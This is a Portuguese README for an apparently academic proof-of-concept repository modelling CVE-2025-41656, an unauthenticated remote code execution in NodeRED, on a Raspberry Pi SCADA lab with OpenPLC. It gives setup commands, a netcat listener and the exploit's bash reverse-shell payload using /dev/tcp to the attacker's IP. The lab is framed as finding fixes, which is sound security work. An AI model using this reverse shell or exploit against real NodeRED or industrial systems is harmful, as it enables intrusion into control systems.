
Este repositório inclui o código e os arquivos necessários para testar e executar um PoC para CVE-2025-41656
Este projeto existe para modelar a CVE-2025-41656, uma vulnerabilidade de execução remota de código não autenticada no NodeRED. Para modelar essa vulnerabilidade, criamos um sistema SCADA de pequeno formato com um Raspberry Pi, um atuador e um sensor. O Raspberry Pi contém um container NodeRED e um OpenPLC que se comunicam entre si via Modbus TCP para controlar o atuador. Este é um script de prova de conceito em Python para executar o ataque da CVE-2025-41656. O objetivo é criar com sucesso um PoC e encontrar correções para proteger o sistema.
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
docker container ls
docker network inspect csci587-final-project_scadanet
nc -lvnp 1234NODE_RED_IP e o NODE_RED_PORT para o endereço IP e a porta (1880) do seu serviço NodeRED em cve_2025_41656.py.cve_2025_41656, altere o endereço IP na linha "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", para o endereço IP da máquina a partir da qual você está lançando o exploit.python3 cve_2025_41656.py